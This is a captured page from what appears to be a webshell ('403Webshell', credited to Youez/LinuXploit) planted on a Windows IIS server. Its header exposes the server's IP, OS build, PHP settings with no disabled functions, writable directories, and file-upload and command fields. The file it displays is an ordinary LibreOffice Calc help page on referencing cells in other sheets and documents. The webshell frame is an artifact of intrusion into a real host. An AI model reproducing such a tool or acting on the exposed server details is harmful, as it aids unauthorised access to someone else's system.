403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.94
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files/LibreOffice/help/en-US/text/scalc/guide/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Program Files/LibreOffice/help/en-US/text/scalc/guide/cellreferences.html
<!DOCTYPE html>
<html lang="en-US" dir="ltr">
<head>
<base href="../../../../">
<noscript><meta http-equiv="refresh" content="0; URL=../../../../en-US/noscript.html"></noscript>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Referencing a Cell in Another Document</title>
<link rel="shortcut icon" href="media/navigation/favicon.ico">
<link type="text/css" href="normalize.css" rel="Stylesheet">
<link type="text/css" href="prism.css" rel="Stylesheet">
<link type="text/css" href="default.css" rel="Stylesheet">
<script type="text/javascript" src="polyfills.js"></script><script type="text/javascript" src="languages.js"></script><script type="text/javascript" src="en-US/langnames.js"></script><script type="text/javascript" src="flexsearch.debug.js"></script><script type="text/javascript" src="prism.js"></script><script type="text/javascript" src="help2.js" defer></script><script type="text/javascript" src="a11y-toggle.js" defer></script><script type="text/javascript" src="paginathing.js" defer></script><script type="text/javascript" src="en-US/bookmarks.js" defer></script><script type="text/javascript" src="en-US/contents.js" defer></script><script type="text/javascript" src="help.js" defer></script><meta name="viewport" content="width=device-width,initial-scale=1">
</head>
<body>
<header id="TopLeftHeader"><a class="symbol" href="en-US/text/shared/05/new_help.html"><div></div></a><a class="logo" href="en-US/text/shared/05/new_help.html"><p dir="auto">LibreOffice 24.2 Help</p></a><div class="dropdowns"><div class="modules">
<button type="button" data-a11y-toggle="modules-nav" id="modules" aria-haspopup="true" aria-expanded="false" aria-controls="modules-nav">Module</button><nav id="modules-nav" hidden=""></nav>
</div></div></header><aside class="leftside"><input id="accordion-1" name="accordion-menu" type="checkbox"><label for="accordion-1" dir="auto">Contents</label><div id="Contents" class="contents-treeview"></div></aside><div id="SearchFrame"><div id="Bookmarks">
<input id="search-bar" type="search" class="search" placeholder="Search in bookmarks for chosen module" dir="auto"><div class="nav-container" tabindex="0"><nav class="index" dir="auto"></nav></div>
</div></div>
<div id="DisplayArea" itemprop="softwareHelp" itemscope="true" itemtype="http://schema.org/SoftwareApplication">
<a name="bm_id3147436"></a><meta itemprop="keywords" content="sheet references">
      <meta itemprop="keywords" content="references, to cells in other sheets/documents">
      <meta itemprop="keywords" content="addresses, to cells in other sheets/documents">
      <meta itemprop="keywords" content="cells, operating in another document">
      <meta itemprop="keywords" content="documents,references">
      <meta itemprop="keywords" content="cell,address">
      <meta itemprop="keywords" content="address, of cell">

<h1 id="hd_id3147436" dir="auto">
<a name="cellreferences"></a>Referencing Other Sheets
</h1>
      <p id="par_id9663075" class="paragraph" dir="auto">In a sheet cell you can show a reference to a cell in another sheet.</p>
      <p id="par_id1879329" class="paragraph" dir="auto">In the same way, a reference can also be made to a cell from another document provided that this document has already been saved as a file.</p>
      <h2 id="hd_id7122409" dir="auto">To Reference a Cell in the Same Document</h2>
      <ol itemprop="HowTo" itemscope="true" itemtype="http://schema.org/HowToSection" dir="auto">
         <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
            <p id="par_id2078005" class="listitem" dir="auto">Open a new, empty spreadsheet. By default, it has only a single sheet named Sheet1. Add a second sheet clicking on <span class="emph">+</span> button to the left of the sheet tab in the bottom (it will be named Sheet2 by default).</p>
         </li>
         <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
            <p id="par_id4943693" class="listitem" dir="auto">By way of example, enter the following formula in cell A1 of Sheet1:</p>
            <p id="par_id9064302" class="listitem" dir="auto">
               <span class="literal">=Sheet2.A1</span>
            </p>
         </li>
         <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
            <p id="par_id7609790" class="listitem" dir="auto">Click the <span class="emph">Sheet 2</span> tab at the bottom of the spreadsheet. Set the cursor in cell A1 there and enter text or a number.</p>
         </li>
         <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
            <p id="par_id809961" class="listitem" dir="auto">If you switch back to Sheet1, you will see the same content in cell A1 there. If the contents of Sheet2.A1 change, then the contents of Sheet1.A1 also change.</p>
         </li>
      </ol>
      <div class="tip">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/tip.svg" alt="tip" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id3147338" dir="auto">When referencing a sheet with name containing spaces, use single quotes around the name: <span class="literal">='Sheet with spaces in name'.A1</span></p></div>
</div>
<br>
      <div class="tip">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/tip.svg" alt="tip" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id3147383" dir="auto">The example uses Calc formula syntax. It is also possible to use Excel A1 or R1C1 formula syntax; this is configured on <a target="_top" href="en-US/text/shared/optionen/01060900.html">Formula options page</a>.</p></div>
</div>
<br>
      <h2 id="hd_id9209570" dir="auto">To Reference a Cell in Another Document</h2>
      <ol itemprop="HowTo" itemscope="true" itemtype="http://schema.org/HowToSection" dir="auto">
         <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
            <p id="par_id5949278" class="listitem" dir="auto">Choose <span class="emph">File - Open</span>, to load an existing spreadsheet document.</p>
         </li>
         <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
            <p id="par_id8001953" class="listitem" dir="auto">Choose <span class="emph">File - New</span>, to open a new spreadsheet document. Set the cursor in the cell where you want to insert the external data and enter an equals sign to indicate that you want to begin a formula.</p>
         </li>
         <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
            <p id="par_id8571123" class="listitem" dir="auto">Now switch to the document you have just loaded. Click the cell with the data that you want to insert in the new document.</p>
         </li>
         <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
            <p id="par_id8261665" class="listitem" dir="auto">Switch back to the new spreadsheet. In the input line you will now see how LibreOffice Calc has added the reference to the formula for you. </p>
            <a name="otherdocref"></a>
               <p id="par_id5888241" class="listitem" dir="auto">The reference to a cell of another document contains the fully qualified name of the other document between single quotes <span class="literal">(')</span>, then a hash <span class="literal">#</span>, then the name of the sheet of the other document, followed by a period and the name or reference of the cell. </p>
               <p id="par_id51672076541215" class="paragraph" dir="auto">For example, <span id="swlnsystextscalcguidecellreferencesxml_1" class="switchinline"><span hidden="true" id="WINtextscalcguidecellreferencesxml_1" class="WIN">'file:///C:/Users/user/Documents/Price list.ods'#$'Information SKU'.H51</span><span hidden="true" id="defaulttextscalcguidecellreferencesxml_1">'file:///home/user/Documents/Price list.ods'#$'Information SKU'.H51</span></span>.</p>
               <div class="note">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/note.svg" alt="note" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id451672076939681" dir="auto">The path and document name URI <span class="emph">must always</span> be enclosed in single quotes. If the name contains single quotes (') they must be escaped using two single quotes (''). Only a sheet name may not be quoted if it does not contain a space or a character that would be an operator or the name would be pure numeric (for example, '123' must be quoted).</p></div>
</div>
<br>
            
         </li>
         <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
            <p id="par_id7697683" class="listitem" dir="auto">Confirm the formula by clicking the green check mark.</p>
         </li>
         <li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
            <p id="par_id7099826" class="listitem" dir="auto">If you drag the box in the lower right corner of the active cell to select a range of cells, LibreOffice automatically inserts the corresponding references in the adjacent cells. As a result, the sheet name is preceded with a "$" sign to designate it as an <a target="_top" href="en-US/text/scalc/guide/relativ_absolut_ref.html">absolute reference</a>.</p>
         </li>
      </ol>
      <p id="par_id674459" class="paragraph" dir="auto">If you examine the name of the other document in this formula, you will notice that it is written as a <a target="_top" href="en-US/text/shared/00/00000002.html#url">URL</a>. This means that you can also enter a URL from the Internet.</p>
      <a name="relatedtopics"></a><div class="relatedtopics">
<p class="related" itemprop="mentions" dir="auto"><a name="related"></a><span class="emph">Related Topics</span>
</p>
<div class="relatedbody" itemprop="mentions">
         <div class="embedded"><p class="embedded" dir="auto"><a target="_top" href="en-US/text/scalc/guide/cellreferences_url.html">Referencing URLs</a>
</p></div>
         <div class="embedded"><p class="embedded" dir="auto"><a target="_top" href="en-US/text/scalc/guide/relativ_absolut_ref.html">Addresses and References, Absolute and Relative</a>
</p></div>
      </div>
</div>
   </div>
<div id="DonationFrame"></div>
<footer><div id="DEBUG" class="debug">
<h3 class="bug">Help content debug info:</h3>
<p dir="auto">This page is: <a href="https://opengrok.libreoffice.org/xref/help/source/text/scalc/guide/cellreferences.xhp" target="_blank">/text/scalc/guide/cellreferences.xhp</a></p>
<p dir="auto">Title is: Referencing a Cell in Another Document</p>
<p id="bm_module" dir="auto"></p>
<p id="bm_system" dir="auto"></p>
<p id="bm_HID" dir="auto"></p>
</div></footer>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit